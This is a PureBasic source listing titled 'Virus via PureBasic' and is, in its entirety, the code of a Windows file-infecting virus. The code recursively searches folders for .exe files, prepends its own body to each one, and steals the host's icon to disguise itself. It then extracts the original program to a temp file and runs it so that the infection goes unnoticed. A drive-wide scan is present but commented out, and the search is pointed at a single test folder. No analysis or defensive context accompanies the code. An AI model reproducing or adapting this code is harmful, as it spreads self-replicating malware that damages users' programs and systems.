Virus via PureBasic

1. EnableExplicit
2.  
3. Global TmpPath$
4. Global VirSize=18944
5. Global icOffset=14496
6. Declare isDriveReady(Path$)
7. Declare GetIcon(FileName.s, *P)
8. Declare FindFiles(Path$,*P, hndl)
9. Declare Infect(Path$, *P)
10. Declare DoSearch(*P, handle)
11. Declare Start()
12. Declare.s RndName()
13.  
14. Procedure isDriveReady(Path$)
15.   If Right(Path$,1) <> "\":Path$+"\":EndIf
16.   ProcedureReturn GetVolumeInformation_(@Path$,0,0,0,0,0,0,0)
17. EndProcedure
18.  
19. Procedure GetIcon(FileName.s, *P)
20.   Protected iconinfo.ICONINFO, hbmMask, hbmColor
21.   Protected cbitmap.BITMAP, cwidth, cheight, cbitsperpixel, colorcount, colorplanes
22.   Protected mbitmap.BITMAP, mwidth, mheight, fIcon, xHotspot, yHotspot, ch
23.   Protected imagebytecount, hdc, oldbitmap, mem, bytesinrow, temp
24.   Protected *bitmapinfo.BITMAPINFO
25.   Protected *PP,hIcon
26.   *PP=*P
27.   hIcon=0
28.   ExtractIconEx_(@FileName,0,@hIcon,0,1)
29.   If Not(GetIconInfo_(hIcon, iconinfo)) : ProcedureReturn 0 : EndIf
30.   fIcon=2-iconinfo\fIcon
31.   *bitmapinfo = GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT,SizeOf(BITMAPINFO) + SizeOf(RGBQUAD)<<8)
32.   hbmMask=iconinfo\hbmMask
33.   GetObject_(hbmMask, SizeOf(BITMAP),mbitmap)
34.   mwidth= mbitmap\bmWidth
35.   mheight= mbitmap\bmHeight
36.   hbmColor=iconinfo\hbmColor
37.   If hbmColor
38.     GetObject_(hbmColor, SizeOf(BITMAP),cbitmap)
39.     cwidth= cbitmap\bmWidth
40.     cheight= cbitmap\bmHeight
41.     cbitsperpixel = cbitmap\bmBitsPixel
42.     If cbitsperpixel = 0 : cbitsperpixel = 1 : EndIf
43.     If cbitsperpixel < 8
44.       colorcount=Pow(2,cbitsperpixel)
45.     EndIf
46.     colorplanes=cbitmap\bmplanes
47.   Else
48.     cwidth= mwidth
49.     cheight= mheight/2
50.     cbitsperpixel = 1
51.     colorcount=2
52.     colorplanes=1
53.     mheight=cheight
54.   EndIf
55.   imagebytecount=SizeOf(BITMAPINFOHEADER)
56.   RtlMoveMemory_(*PP,@imagebytecount,4)
57.   *PP+4
58.   RtlMoveMemory_(*PP,@cwidth,4)
59.   *PP+4
60.   ch=cheight+mheight
61.   RtlMoveMemory_(*PP,@ch,4)
62.   *PP+4
63.   RtlMoveMemory_(*PP,@colorplanes,2)
64.   *PP+2
65.   RtlMoveMemory_(*PP,@cbitsperpixel,2)
66.   *PP+26
67.   hdc=CreateCompatibleDC_(0)
68.   If hbmColor = 0
69.     RtlMoveMemory_(*PP,#Black,4)
70.     *PP+4
71.     RtlMoveMemory_(*PP,#White,4)
72.     *PP+4
73.     imagebytecount+SizeOf(rgbquad)*2
74.   ElseIf cbitsperpixel<=8
75.     temp=Pow(2,cbitsperpixel)
76.     bytesinrow = SizeOf(rgbquad)*temp
77.     mem=GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT,bytesinrow)
78.     oldbitmap=SelectObject_(hdc, hbmColor)
79.     GetDIBColorTable_(hdc, 0, temp, mem)    
80.     RtlMoveMemory_(*PP, mem, bytesinrow)
81.     *PP+bytesinrow
82.     GlobalFree_(mem)
83.     SelectObject_(hdc, oldbitmap)
84.     imagebytecount+bytesinrow
85.   EndIf
86.   bytesinrow = (cwidth*cbitsperpixel+31)/32*4
87.   bytesinrow * cheight
88.   mem=GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT,bytesinrow)
89.   *bitmapinfo\bmiHeader\biSize=SizeOf(BITMAPINFOHEADER)
90.   *bitmapinfo\bmiHeader\biWidth=cwidth
91.   *bitmapinfo\bmiHeader\biPlanes=colorplanes
92.   *bitmapinfo\bmiHeader\biBitCount=cbitsperpixel
93.   If hbmColor
94.     *bitmapinfo\bmiHeader\biHeight=cheight
95.     GetDIBits_(hdc,hbmColor,0,cheight,mem,*bitmapinfo,#DIB_RGB_COLORS)
96.   Else
97.     *bitmapinfo\bmiHeader\biHeight=2*cheight
98.     GetDIBits_(hdc,hbmMask,0,cheight,mem,*bitmapinfo,#DIB_RGB_COLORS)
99.   EndIf
100.   RtlMoveMemory_(*PP, mem, bytesinrow)
101.   *PP+bytesinrow
102.   GlobalFree_(mem)
103.   imagebytecount+bytesinrow
104.   bytesinrow = (mwidth+31)/32*4
105.   bytesinrow * mheight
106.   mem=GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT, bytesinrow)
107.   *bitmapinfo\bmiHeader\biWidth=mwidth
108.   *bitmapinfo\bmiHeader\biPlanes=1
109.   *bitmapinfo\bmiHeader\biBitCount=1
110.   If hbmColor
111.     *bitmapinfo\bmiHeader\biHeight=mheight
112.     GetDIBits_(hdc,hbmMask,0,mheight,mem,*bitmapinfo,#DIB_RGB_COLORS)
113.   Else
114.     *bitmapinfo\bmiHeader\biHeight=2*mheight
115.     GetDIBits_(hdc,hbmMask,mheight,mheight,mem,*bitmapinfo,#DIB_RGB_COLORS)
116.   EndIf
117.   RtlMoveMemory_(*PP,mem, bytesinrow)
118.   GlobalFree_(mem)
119.   DeleteDC_(hdc)
120.   DeleteObject_(hbmMask)
121.   DeleteObject_(hbmColor)
122.   GlobalFree_(*bitmapinfo)
123.   ProcedureReturn 1
124. EndProcedure
125.  
126. Procedure FindFiles(Path$, *P,hndl)
127.   Define hFind.i,WD.WIN32_FIND_DATA,fPath$, fName$,fExt$
128.   If Right(Path$,1) <> "\":Path$=Path$+"\":EndIf
129.   hFind=FindFirstFile_(Path$+"*.*",WD)
130.   If hFind <> #INVALID_HANDLE_VALUE
131.     Repeat
132.       If hndl <> #INVALID_HANDLE_VALUE And WaitForSingleObject_(hndl,0) <> #WAIT_TIMEOUT:Break:EndIf
133.       fName$=PeekS(@wd\cFileName[0])
134.       If fName$ <> "." And fName$ <> ".."
135.         fName$=Path$+fName$
136.         If (WD\dwFileAttributes & #FILE_ATTRIBUTE_DIRECTORY)=#FILE_ATTRIBUTE_DIRECTORY
137.           FindFiles(fName$, *P, hndl)
138.         Else
139.           fExt$=Right(fName$,3)
140.           fExt$=LCase(fExt$)
141.           If fExt$="exe"
142.             Infect(fName$, *P)
143.           EndIf
144.         EndIf
145.       EndIf
146.     Until FindNextFile_(hFind, WD) <> #True
147.     FindClose_(hFind)
148.   EndIf
149. EndProcedure
150.  
151. Procedure Infect(Path.s, *P)
152.   Define hFile.i,fSize.i,*nBuff, BR,*IC
153.   *IC=GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT,4286)
154.   GetIcon(Path, *IC)
155.   hFile=CreateFile_(@Path,#GENERIC_READ|#GENERIC_WRITE,#FILE_SHARE_READ,0,#OPEN_EXISTING,0,0)
156.   If hFile=#INVALID_HANDLE_VALUE:Goto Close:EndIf
157.   fSize=GetFileSize_(hFile,0)
158.   If fSize < 16000 And fSize > 5194368 :Goto Close :EndIf
159.   BR=0
160.   *nBuff=GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT,fSize+VirSize)
161.   RtlMoveMemory_(*nBuff, *P, VirSize)
162.   RtlMoveMemory_(*nBuff+icoffset,*IC,  4264)
163.   SetFilePointer_(hFile,0,0,#FILE_BEGIN)
164.   ReadFile_(hFile,*nBuff+VirSize,fSize,@BR,0)
165.   If CompareMemory(*P, *nBuff+VirSize,200) <> 0:Goto Exit:EndIf
166.   SetFilePointer_(hFile,0,0,#FILE_BEGIN)
167.   SetEndOfFile_(hFile)
168.   WriteFile_(hFile, *nBuff, fSize+VirSize, @BR,0)
169.   SetEndOfFile_(hFile)
170.   Exit:
171.   GlobalFree_(*nBuff)
172.   Close:
173.   CloseHandle_(hFile)
174.   GlobalFree_(*IC)
175. EndProcedure
176.  
177. Procedure DoSearch(*P, handle)
178.  ; Define C$,I
179.  ;  For I=67 To 90
180.  ;  FindFiles(Chr(I)+":\", *P,handle)
181.  ; Next
182.   findfiles("C:\olo",*P, Handle)
183. EndProcedure
184.  
185. Procedure.s RndName()
186.   Define I,R,Result$
187.   Result$=""
188.   For I=1 To 4
189.     R=Random(91)
190.     If R < 65
191.       R=65
192.     ElseIf R> 90
193.       R=90
194.     EndIf
195.     Result$+Chr(R)
196.   Next
197.   ProcedureReturn Result$
198. EndProcedure
199.  
200. Procedure Start()
201.   Define hFile.i,fSize.i, BR.l, *FBuff,PI.PROCESS_INFORMATION,SI.STARTUPINFO, rName$,AppName$
202.   SetErrorMode_(#SEM_FAILCRITICALERRORS)
203.   TmpPath$=Space(300)
204.   RSet(TmpPath$,GetTempPath_(300, @TmpPath$))
205.   AppName$=Space(300)
206.   RSet(AppName$, GetModuleFileName_(0,@AppName$,300))
207.   hFile=CreateFile_(AppName$, #GENERIC_READ,#FILE_SHARE_READ,0,#OPEN_EXISTING,0,0)
208.   If hFile=#INVALID_HANDLE_VALUE:End :EndIf
209.   fSize=GetFileSize_(hFile,0)
210.   *FBuff=GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT,fSize)
211.   SetFilePointer_(hFile,0,0,#FILE_BEGIN)
212.   ReadFile_(hFile,*FBuff,fSize,@BR,0)
213.   CloseHandle_(hFile)
214.   If fSize > VirSize
215.     rName$=rndName()
216.     rName$=TmpPath$+rName$
217.     MoveFile_(@AppName$, @rName$)
218.     hFile=CreateFile_(@AppName$, #GENERIC_WRITE,#FILE_SHARE_READ,0,#CREATE_ALWAYS,0,0)
219.     If hFile=#INVALID_HANDLE_VALUE:End :EndIf
220.     SetFilePointer_(hFile,0,0,#FILE_BEGIN)
221.     WriteFile_(hFile,*fBuff+VirSize,fSize-VirSize,@BR,0)
222.     SetFilePointer_(hFile,fSize-VirSize,0,#FILE_BEGIN)
223.     WriteFile_(hFile,*fBuff,VirSize,@BR,0)
224.     SetEndOfFile_(hFile)
225.     CloseHandle_(hFile)
226.     ZeroMemory_(@PI, SizeOf(PROCESS_INFORMATION))
227.     ZeroMemory_(@SI, SizeOf(STARTUPINFO))
228.     CreateProcess_(@AppName$, GetCommandLine_(),0,0,0,0,0,0,@SI,@PI)
229.     DoSearch(*fBuff, PI\hProcess)
230.     Repeat
231.       If DeleteFile_(@AppName$)
232.         MoveFile_(@rName$, @AppName$)
233.         Break
234.       EndIf
235.       Sleep_(100)
236.     ForEver
237.   EndIf
238.   DoSearch(*fBuff,#INVALID_HANDLE_VALUE)
239.   GlobalFree_(*fBuff)
240. EndProcedure
241.  
242.  
243. Start()